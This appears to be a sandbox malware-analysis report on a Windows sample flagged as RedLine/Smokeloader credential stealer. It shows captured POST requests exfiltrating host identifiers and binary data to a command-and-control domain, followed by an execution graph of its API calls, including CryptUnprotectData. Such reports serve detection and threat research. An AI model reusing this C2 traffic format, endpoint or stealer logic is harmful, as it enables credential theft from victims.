                                                                      2025-01-09 07:43:38 UTC12841OUTData Raw: 2d 2d 36 43 50 39 56 57 4d 35 51 50 31 49 4d 36 38 59 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 31 33 35 30 31 35 45 43 41 46 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 36 43 50 39 56 57 4d 35 51 50 31 49 4d 36 38 59 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 43 50 39 56 57 4d 35 51 50 31 49 4d 36 38 59 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36
                                                                      Data Ascii: --6CP9VWM5QP1IM68YURContent-Disposition: form-data; name="hwid"6D135015ECAF0672D0632DF0E28DC412--6CP9VWM5QP1IM68YURContent-Disposition: form-data; name="pid"2--6CP9VWM5QP1IM68YURContent-Disposition: form-data; name="lid"4h5VfH----6
                                                                      2025-01-09 07:43:38 UTC1133INHTTP/1.1 200 OK
                                                                      Date: Thu, 09 Jan 2025 07:43:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=5ec4uc9m86eqlvt5hr0et8vlrj; expires=Mon, 05 May 2025 01:30:17 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UO8klG%2BXoft2SUBXANcGb56RzYSaCGn9Gt5TMf4tfWcTbhAyI0bztkvYJPFasVqnifHzX2PzhvZ8s5sMUcpI0CUxpCZVqU%2FeQXR84DgNaZdID24%2F%2BIw9aAC6dji2K64Ltv72ACU%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ff2cc2719474363-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1545&rtt_var=592&sent=10&recv=18&lost=0&retrans=0&sent_bytes=3057&recv_bytes=13783&delivery_rate=2746081&cwnd=241&unsent_bytes=0&cid=cb42fadd87d6b723&ts=583&x=0"
                                                                      2025-01-09 07:43:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                      Data Ascii: fok 8.46.123.189
                                                                      2025-01-09 07:43:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.849709104.21.96.14432960C:\Users\user\Desktop\uU6IvUPN39.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-09 07:43:39 UTC283OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=PL5DDJ64YC5FJAOGW
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15064
                                                                      Host: skidjazzyric.click
                                                                      2025-01-09 07:43:39 UTC15064OUTData Raw: 2d 2d 50 4c 35 44 44 4a 36 34 59 43 35 46 4a 41 4f 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 31 33 35 30 31 35 45 43 41 46 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 50 4c 35 44 44 4a 36 34 59 43 35 46 4a 41 4f 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4c 35 44 44 4a 36 34 59 43 35 46 4a 41 4f 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 50 4c 35 44
                                                                      Data Ascii: --PL5DDJ64YC5FJAOGWContent-Disposition: form-data; name="hwid"6D135015ECAF0672D0632DF0E28DC412--PL5DDJ64YC5FJAOGWContent-Disposition: form-data; name="pid"2--PL5DDJ64YC5FJAOGWContent-Disposition: form-data; name="lid"4h5VfH----PL5D
                                                                      2025-01-09 07:43:39 UTC1133INHTTP/1.1 200 OK
                                                                      Date: Thu, 09 Jan 2025 07:43:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=np9ok5feu6n1nve72be9kpuofb; expires=Mon, 05 May 2025 01:30:18 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IFDN8QONok7dnznHCZcR1CCa3O%2BVQtOxgMqanGvdoWiXCD%2FqO1AZm6787cR00Td3RkzTrb%2BeEXWo6qsDCITPzkyD771iyq36AF0I07ai0KxZPD%2FoTxH5pqfrKCTDEiwHXS1fLh8%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ff2cc303f0f4363-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1570&rtt_var=596&sent=16&recv=21&lost=0&retrans=0&sent_bytes=3058&recv_bytes=16005&delivery_rate=2739212&cwnd=241&unsent_bytes=0&cid=33e0a0e70dfb8e9c&ts=797&x=0"
                                                                      2025-01-09 07:43:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                      Data Ascii: fok 8.46.123.189
                                                                      2025-01-09 07:43:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.849710104.21.96.14432960C:\Users\user\Desktop\uU6IvUPN39.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-09 07:43:40 UTC283OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=R4D3TTVIKNLEDKWYQ
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20231
                                                                      Host: skidjazzyric.click
                                                                      2025-01-09 07:43:40 UTC15331OUTData Raw: 2d 2d 52 34 44 33 54 54 56 49 4b 4e 4c 45 44 4b 57 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 31 33 35 30 31 35 45 43 41 46 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 52 34 44 33 54 54 56 49 4b 4e 4c 45 44 4b 57 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 34 44 33 54 54 56 49 4b 4e 4c 45 44 4b 57 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 52 34 44 33
                                                                      Data Ascii: --R4D3TTVIKNLEDKWYQContent-Disposition: form-data; name="hwid"6D135015ECAF0672D0632DF0E28DC412--R4D3TTVIKNLEDKWYQContent-Disposition: form-data; name="pid"3--R4D3TTVIKNLEDKWYQContent-Disposition: form-data; name="lid"4h5VfH----R4D3
                                                                      2025-01-09 07:43:40 UTC4900OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00
                                                                      Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                      2025-01-09 07:43:41 UTC1133INHTTP/1.1 200 OK
                                                                      Date: Thu, 09 Jan 2025 07:43:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ihqo9nfnn5ca34mkhbqil55jb5; expires=Mon, 05 May 2025 01:30:20 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tIIHGLIUU%2FUAtXQtek4U5CDCnk4l0RRxeFepBBD01MBJpiP4J9KzTgLUr%2FLlNbCj5Dlyo2SQE2vRTMsoJL461MeqD5umHrA5AFhpFJzI%2BnEjYy9J8f%2FWSwh7OdPSteErhGLLd5o%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ff2cc37ffa072a4-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1949&rtt_var=748&sent=12&recv=25&lost=0&retrans=0&sent_bytes=3056&recv_bytes=21194&delivery_rate=2169390&cwnd=213&unsent_bytes=0&cid=39e7461dc23e3947&ts=640&x=0"
                                                                      2025-01-09 07:43:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                      Data Ascii: fok 8.46.123.189
                                                                      2025-01-09 07:43:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:02:43:31
                                                                      Start date:09/01/2025
                                                                      Path:C:\Users\user\Desktop\uU6IvUPN39.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\uU6IvUPN39.exe"
                                                                      Imagebase:0x400000
                                                                      File size:450'560 bytes
                                                                      MD5 hash:A478B8943EF3239752D731E7290C4A3D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:02:43:40
                                                                      Start date:09/01/2025
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820
                                                                      Imagebase:0xc10000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3.1%
                                                                        Dynamic/Decrypted Code Coverage:20%
                                                                        Signature Coverage:56.1%
                                                                        Total number of Nodes:155
                                                                        Total number of Limit Nodes:12
                                                                        execution_graph 26181 408880 26183 40888f 26181->26183 26182 408ab5 ExitProcess 26183->26182 26184 4088a4 GetCurrentProcessId GetCurrentThreadId 26183->26184 26190 408a99 26183->26190 26185 4088ca 26184->26185 26186 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26184->26186 26185->26186 26187 408974 26186->26187 26191 43eb20 26187->26191 26189 4089cf 26189->26190 26190->26182 26190->26189 26194 441850 26191->26194 26193 43eb2a RtlAllocateHeap 26193->26189 26195 441870 26194->26195 26195->26193 26195->26195 26263 415720 26264 415740 26263->26264 26302 443190 26264->26302 26266 415882 26267 4158ab 26266->26267 26271 415ad2 26266->26271 26273 415b37 26266->26273 26295 4158ea 26266->26295 26310 443440 LdrInitializeThunk 26266->26310 26267->26271 26267->26273 26267->26295 26311 4434d0 26267->26311 26271->26295 26317 4402c0 LdrInitializeThunk 26271->26317 26273->26273 26274 443190 LdrInitializeThunk 26273->26274 26275 415c8d 26274->26275 26276 415d02 26275->26276 26278 415d3e 26275->26278 26275->26295 26318 443440 LdrInitializeThunk 26275->26318 26276->26278 26279 4434d0 LdrInitializeThunk 26276->26279 26293 415dbe 26278->26293 26319 4402c0 LdrInitializeThunk 26278->26319 26279->26278 26281 416498 26282 41647e 26321 419840 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26282->26321 26284 41632f 26284->26281 26286 4163b2 26284->26286 26300 4164c2 26284->26300 26285 416087 26285->26281 26285->26282 26285->26284 26320 41bba0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26286->26320 26287 41605d CryptUnprotectData 26287->26284 26287->26285 26288 416483 26288->26281 26299 41687e 26288->26299 26323 4402c0 LdrInitializeThunk 26288->26323 26291 41672c 26322 41bba0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26291->26322 26293->26285 26293->26287 26294 4168b7 26298 416bd9 26294->26298 26325 4402c0 LdrInitializeThunk 26294->26325 26299->26294 26299->26298 26324 4402c0 LdrInitializeThunk 26299->26324 26300->26291 26300->26295 26306 4432f0 26300->26306 26304 4431b0 26302->26304 26303 443298 26303->26266 26304->26303 26326 4402c0 LdrInitializeThunk 26304->26326 26308 443310 26306->26308 26307 4433ee 26307->26300 26308->26307 26327 4402c0 LdrInitializeThunk 26308->26327 26310->26267 26312 4434e9 26311->26312 26313 4158db 26311->26313 26312->26313 26328 4402c0 LdrInitializeThunk 26312->26328 26313->26271 26313->26273 26313->26295 26315 443538 26315->26313 26329 4402c0 LdrInitializeThunk 26315->26329 26317->26295 26318->26276 26319->26293 26320->26295 26321->26288 26322->26295 26323->26299 26324->26294 26325->26294 26326->26303 26327->26307 26328->26315 26329->26313 26196 43eb40 26197 43eb53 26196->26197 26198 43eb55 26196->26198 26199 43eb5a RtlFreeHeap 26198->26199 26200 6aa526 26201 6aa529 26200->26201 26204 6aa7be 26201->26204 26205 6aa7cd 26204->26205 26208 6aaf5e 26205->26208 26213 6aaf79 26208->26213 26209 6aaf82 CreateToolhelp32Snapshot 26210 6aaf9e Module32First 26209->26210 26209->26213 26211 6aafad 26210->26211 26214 6aa7bd 26210->26214 26215 6aac1d 26211->26215 26213->26209 26213->26210 26216 6aac48 26215->26216 26217 6aac59 VirtualAlloc 26216->26217 26218 6aac91 26216->26218 26217->26218 26218->26218 26330 40cfec 26331 40d010 26330->26331 26334 43b870 26331->26334 26333 40d175 26335 43b8b0 26334->26335 26335->26335 26336 43bc86 CoCreateInstance 26335->26336 26337 43c217 26336->26337 26338 43bcda SysAllocString 26336->26338 26339 43c227 GetVolumeInformationW 26337->26339 26341 43bd6a 26338->26341 26346 43c249 26339->26346 26342 43bd72 CoSetProxyBlanket 26341->26342 26343 43c206 SysFreeString 26341->26343 26344 43bd92 SysAllocString 26342->26344 26345 43c1fc 26342->26345 26343->26337 26348 43be80 26344->26348 26345->26343 26346->26333 26348->26348 26349 43becf SysAllocString 26348->26349 26351 43bef2 26349->26351 26350 43c1e7 SysFreeString SysFreeString 26350->26345 26351->26350 26352 43c1dd 26351->26352 26353 43bf39 VariantInit 26351->26353 26352->26350 26355 43bf90 26353->26355 26354 43c1cc VariantClear 26354->26352 26355->26354 26356 4406eb 26357 44072e 26356->26357 26358 44070c 26356->26358 26358->26357 26360 4402c0 LdrInitializeThunk 26358->26360 26360->26357 26219 40ab12 26220 40ab22 26219->26220 26221 40ab3d WSAStartup 26220->26221 26222 40df92 CoInitializeSecurity 26361 421370 26362 4213d8 26361->26362 26363 42137e 26361->26363 26367 421490 26363->26367 26368 4214a0 26367->26368 26368->26368 26369 4432f0 LdrInitializeThunk 26368->26369 26370 42157f 26369->26370 26223 40e3d3 CoInitializeEx CoInitializeEx 26224 442390 26226 4423b0 26224->26226 26225 442439 26226->26225 26228 4402c0 LdrInitializeThunk 26226->26228 26228->26225 26371 4404b1 GetForegroundWindow 26372 4404ce 26371->26372 26229 2130005 26234 213092b GetPEB 26229->26234 26231 2130030 26235 213003c 26231->26235 26234->26231 26236 2130049 26235->26236 26250 2130e0f SetErrorMode SetErrorMode 26236->26250 26241 2130265 26242 21302ce VirtualProtect 26241->26242 26244 213030b 26242->26244 26243 2130439 VirtualFree 26248 21305f4 LoadLibraryA 26243->26248 26249 21304be 26243->26249 26244->26243 26245 21304e3 LoadLibraryA 26245->26249 26247 21308c7 26248->26247 26249->26245 26249->26248 26251 2130223 26250->26251 26252 2130d90 26251->26252 26253 2130dad 26252->26253 26254 2130dbb GetPEB 26253->26254 26255 2130238 VirtualAlloc 26253->26255 26254->26255 26255->26241 26256 440cde 26257 440ce8 26256->26257 26259 440dae 26257->26259 26262 4402c0 LdrInitializeThunk 26257->26262 26261 4402c0 LdrInitializeThunk 26259->26261 26261->26259 26262->26259 26378 4409b8 26379 4409d0 26378->26379 26380 440a3e 26379->26380 26384 4402c0 LdrInitializeThunk 26379->26384 26382 440a8e 26380->26382 26385 4402c0 LdrInitializeThunk 26380->26385 26384->26380 26385->26382

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 43b870-43b8af 1 43b8b0-43b95c 0->1 1->1 2 43b962-43b97f 1->2 3 43b980-43b9a4 2->3 3->3 4 43b9a6-43b9ef 3->4 5 43b9f0-43ba04 4->5 5->5 6 43ba06-43ba28 5->6 8 43bb5b-43bb6f 6->8 9 43ba2e-43ba46 6->9 10 43bb70-43bb8a 8->10 11 43ba50-43bae4 9->11 10->10 13 43bb8c-43bbef 10->13 11->11 12 43baea-43bb0f 11->12 14 43bb10-43bb3e 12->14 15 43bbf0-43bc11 13->15 14->14 16 43bb40-43bb57 14->16 15->15 17 43bc13-43bc6f 15->17 16->8 18 43bc70-43bc84 17->18 18->18 19 43bc86-43bcd4 CoCreateInstance 18->19 20 43c217-43c247 call 441c40 GetVolumeInformationW 19->20 21 43bcda-43bd1f 19->21 26 43c251-43c253 20->26 27 43c249-43c24d 20->27 23 43bd20-43bd3f 21->23 23->23 25 43bd41-43bd6c SysAllocString 23->25 32 43bd72-43bd8c CoSetProxyBlanket 25->32 33 43c206-43c213 SysFreeString 25->33 28 43c26d-43c274 26->28 27->26 30 43c276-43c27d 28->30 31 43c28d-43c2af 28->31 30->31 36 43c27f-43c28b 30->36 37 43c2b0-43c2c4 31->37 34 43bd92-43bdb2 32->34 35 43c1fc-43c202 32->35 33->20 38 43bdc0-43bde6 34->38 35->33 36->31 37->37 39 43c2c6-43c309 37->39 38->38 40 43bde8-43be72 SysAllocString 38->40 41 43c310-43c351 39->41 43 43be80-43becd 40->43 41->41 42 43c353-43c37f call 41dcb0 41->42 47 43c380-43c388 42->47 43->43 45 43becf-43bef7 SysAllocString 43->45 50 43c1e7-43c1f8 SysFreeString * 2 45->50 51 43befd-43bf1f 45->51 47->47 49 43c38a-43c38c 47->49 52 43c392-43c3a2 call 4081e0 49->52 53 43c260-43c267 49->53 50->35 58 43bf25-43bf28 51->58 59 43c1dd-43c1e3 51->59 52->53 53->28 55 43c3a7-43c3ae 53->55 58->59 60 43bf2e-43bf33 58->60 59->50 60->59 61 43bf39-43bf89 VariantInit 60->61 62 43bf90-43bfaf 61->62 62->62 63 43bfb1-43bfc2 62->63 64 43bfc6-43bfcb 63->64 65 43bfd1-43bfd7 64->65 66 43c1cc-43c1d9 VariantClear 64->66 65->66 67 43bfdd-43bfea 65->67 66->59 68 43c033 67->68 69 43bfec-43bff1 67->69 71 43c035-43c04f call 408160 68->71 70 43c00c-43c010 69->70 72 43c012-43c01d 70->72 73 43c000 70->73 80 43c055-43c05f 71->80 81 43c17e-43c18f 71->81 76 43c026-43c02c 72->76 77 43c01f-43c024 72->77 75 43c001-43c00a 73->75 75->70 75->71 76->75 79 43c02e-43c031 76->79 77->75 79->75 80->81 82 43c065-43c06f 80->82 83 43c191 81->83 84 43c196-43c1a2 81->84 85 43c070-43c07e 82->85 83->84 86 43c1a4 84->86 87 43c1a9-43c1c9 call 408190 call 408170 84->87 88 43c090-43c096 85->88 89 43c080-43c085 85->89 86->87 87->66 92 43c098-43c09b 88->92 93 43c0bd-43c0c9 88->93 91 43c130-43c134 89->91 99 43c136-43c13c 91->99 92->93 95 43c09d-43c0bb 92->95 96 43c0cb-43c0ce 93->96 97 43c148-43c150 93->97 95->91 96->97 100 43c0d0-43c121 96->100 97->99 103 43c152-43c155 97->103 99->81 102 43c13e-43c140 99->102 100->91 102->85 104 43c146 102->104 105 43c157-43c178 103->105 106 43c17a-43c17c 103->106 104->81 105->91 106->91
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                        • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                        • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                        • API String ID: 1810270423-2807872674
                                                                        • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                        • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                        • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                        • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
                                                                        • API String ID: 0-3642574725
                                                                        • Opcode ID: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
                                                                        • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                        • Opcode Fuzzy Hash: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
                                                                        • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 580 408880-408891 call 43fba0 583 408ab5-408ab7 ExitProcess 580->583 584 408897-40889e call 4385b0 580->584 587 408ab0 call 440240 584->587 588 4088a4-4088c8 GetCurrentProcessId GetCurrentThreadId 584->588 587->583 589 4088ca-4088cc 588->589 590 4088ce-408972 SHGetSpecialFolderPathW GetForegroundWindow 588->590 589->590 592 408974-408997 590->592 593 408999-4089a8 590->593 592->593 594 4089b0-4089c4 593->594 594->594 595 4089c6-4089f2 call 43eb20 594->595 598 408a00-408a3b 595->598 599 408a74-408a92 call 409ce0 598->599 600 408a3d-408a72 598->600 603 408a94 call 40cdd0 599->603 604 408a9e-408aa5 599->604 600->598 608 408a99 call 40ba80 603->608 604->587 605 408aa7-408aad call 408170 604->605 605->587 608->604
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                        • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                        • GetForegroundWindow.USER32 ref: 0040896A
                                                                        • ExitProcess.KERNEL32 ref: 00408AB7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                        • String ID: 6W01
                                                                        • API String ID: 4063528623-326071965
                                                                        • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                        • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                        • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
